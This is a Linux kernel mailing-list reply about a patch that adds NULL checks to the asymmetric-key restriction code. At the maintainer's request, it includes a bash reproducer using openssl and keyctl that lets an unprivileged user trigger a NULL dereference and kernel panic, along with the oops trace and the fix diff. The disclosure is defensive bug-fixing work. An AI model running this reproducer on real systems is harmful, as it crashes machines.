All of lore.kernel.org
 help / color / mirror / Atom feed
From: Weiming Shi <bestswngs@gmail.com>
To: Ignat Korchagin <ignat@linux.win>, g@air.local
Cc: David Howells <dhowells@redhat.com>,
	Lukas Wunner <lukas@wunner.de>,
	Herbert Xu <herbert@gondor.apana.org.au>,
	"David S . Miller" <davem@davemloft.net>,
	Jarkko Sakkinen <jarkko@kernel.org>,
	Andrew Zaborowski <andrew.zaborowski@intel.com>,
	keyrings@vger.kernel.org, linux-crypto@vger.kernel.org,
	Xiang Mei <xmei5@asu.edu>
Subject: Re: [PATCH] asymmetric_keys: check asymmetric_key_ids() for NULL before dereference
Date: Fri, 1 May 2026 15:48:34 +0800	[thread overview]
Message-ID: <afRa0lc2A4kHk9at@Air.local> (raw)
In-Reply-To: <CAOs+rJUiup_B1ve7UztJH4crzE+98ZObRc3jLRsqkhLekpDmxA@mail.gmail.com>

On 26-05-01 06:37, Ignat Korchagin wrote:
> Hi,
> 
> Thanks for the report.
> 
> On Wed, Apr 29, 2026 at 7:17 PM Weiming Shi <bestswngs@gmail.com> wrote:
> >
> > asymmetric_key_ids() returns key->payload.data[asym_key_ids], which can
> > be NULL for keys parsed by the PKCS#8 parser (pkcs8_parser.c explicitly
> > stores NULL in prep->payload.data[asym_key_ids]).
> >
> > key_or_keyring_common() in restrict.c and find_asymmetric_key() in
> > asymmetric_type.c both dereference this return value without checking
> > for NULL. An unprivileged user can trigger a NULL pointer dereference
> > in key_or_keyring_common() by creating a PKCS#8 key, restricting a
> > keyring with key_or_keyring:<pkcs8_serial>, and adding an X.509 cert
> > to the restricted keyring. CONFIG_PKCS8_PRIVATE_KEY_PARSER=y is
> 
> Could you add a simple bash script for this to the commit message?
> 

Hi Ignat,

Sure, here is a bash reproducer:

```
#!/bin/bash
modprobe pkcs8_key_parser 2>/dev/null
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:1024 \
    -out /tmp/poc.pem 2>/dev/null
openssl pkcs8 -topk8 -nocrypt -in /tmp/poc.pem \
    -outform DER -out /tmp/poc.p8
openssl req -new -x509 -key /tmp/poc.pem -outform DER \
    -out /tmp/poc.der -days 365 -subj "/CN=Test" \
    -addext "subjectKeyIdentifier=hash" \
    -addext "authorityKeyIdentifier=keyid:always" 2>/dev/null
PKCS8_ID=$(keyctl padd asymmetric pkcs8key @s < /tmp/poc.p8)
KR=$(keyctl newring test_kr @s)
keyctl restrict_keyring $KR asymmetric "key_or_keyring:$PKCS8_ID"
keyctl padd asymmetric trigger $KR < /tmp/poc.der
rm -f /tmp/poc.pem /tmp/poc.p8 /tmp/poc.der
```
If you'd prefer it in the commit message I can send a v2.

Thanks,
Weiming Shi


> > required.
> >
> >  Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000
> >  KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
> >  RIP: 0010:key_or_keyring_common (crypto/asymmetric_keys/restrict.c:205 crypto/asymmetric_keys/restrict.c:279)
> >  Call Trace:
> >   <TASK>
> >   __key_create_or_update (security/keys/key.c:884)
> >   key_create_or_update (security/keys/key.c:1021)
> >   __do_sys_add_key (security/keys/keyctl.c:134)
> >   do_syscall_64 (arch/x86/entry/common.c:52 arch/x86/entry/common.c:83)
> >   entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)
> >   </TASK>
> >  Kernel panic - not syncing: Fatal exception
> >
> > Add a NULL check in find_asymmetric_key(), mirroring the existing
> > pattern in asymmetric_match_key_ids() and asymmetric_key_describe().
> > In key_or_keyring_common(), skip the trusted key matching when it
> > has no key IDs and fall through to the check_dest path.
> >
> > Fixes: 7d30198ee24f ("keys: X.509 public key issuer lookup without AKID")
> > Reported-by: Xiang Mei <xmei5@asu.edu>
> > Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> > ---
> >  crypto/asymmetric_keys/asymmetric_type.c | 2 ++
> >  crypto/asymmetric_keys/restrict.c        | 9 ++++++---
> >  2 files changed, 8 insertions(+), 3 deletions(-)
> >
> > diff --git a/crypto/asymmetric_keys/asymmetric_type.c b/crypto/asymmetric_keys/asymmetric_type.c
> > --- a/crypto/asymmetric_keys/asymmetric_type.c
> > +++ b/crypto/asymmetric_keys/asymmetric_type.c
> > @@ -109,6 +109,8 @@ struct key *find_asymmetric_key(struct key *keyring,
> >         if (id_0 && id_1) {
> >                 const struct asymmetric_key_ids *kids = asymmetric_key_ids(key);
> >
> > +               if (!kids)
> > +                       goto reject;
> >                 if (!kids->id[1]) {
> >                         pr_debug("First ID matches, but second is missing\n");
> >                         goto reject;
> > diff --git a/crypto/asymmetric_keys/restrict.c b/crypto/asymmetric_keys/restrict.c
> > --- a/crypto/asymmetric_keys/restrict.c
> > +++ b/crypto/asymmetric_keys/restrict.c
> > @@ -243,10 +243,14 @@ static int key_or_keyring_common(struct key *dest_keyring,
> >                         if (IS_ERR(key))
> >                                 key = NULL;
> >                 } else if (trusted->type == &key_type_asymmetric) {
> > +                       const struct asymmetric_key_ids *kids;
> >                         const struct asymmetric_key_id **signer_ids;
> >
> > -                       signer_ids = (const struct asymmetric_key_id **)
> > -                               asymmetric_key_ids(trusted)->id;
> > +                       kids = asymmetric_key_ids(trusted);
> > +                       if (!kids)
> > +                               goto skip_trusted;
> > +
> > +                       signer_ids = (const struct asymmetric_key_id **)kids->id;
> >
> >                         /*
> >                          * The auth_ids come from the candidate key (the
> > @@ -290,6 +294,7 @@ static int key_or_keyring_common(struct key *dest_keyring,
> >                 }
> >         }
> >
> > +skip_trusted:
> >         if (check_dest && !key) {
> >                 /* See if the destination has a key that signed this one. */
> >                 key = find_asymmetric_key(dest_keyring, sig->auth_ids[0],
> > --
> > 2.39.0
> >
> 
> Ignat

  reply	other threads:[~2026-05-01  7:48 UTC|newest]

Thread overview: 4+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-04-29 18:16 [PATCH] asymmetric_keys: check asymmetric_key_ids() for NULL before dereference Weiming Shi
2026-05-01  5:37 ` Ignat Korchagin
2026-05-01  7:48   ` Weiming Shi [this message]
2026-05-02  8:40     ` Ignat Korchagin

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=afRa0lc2A4kHk9at@Air.local \
    --to=bestswngs@gmail.com \
    --cc=andrew.zaborowski@intel.com \
    --cc=davem@davemloft.net \
    --cc=dhowells@redhat.com \
    --cc=g@air.local \
    --cc=herbert@gondor.apana.org.au \
    --cc=ignat@linux.win \
    --cc=jarkko@kernel.org \
    --cc=keyrings@vger.kernel.org \
    --cc=linux-crypto@vger.kernel.org \
    --cc=lukas@wunner.de \
    --cc=xmei5@asu.edu \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body. 
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.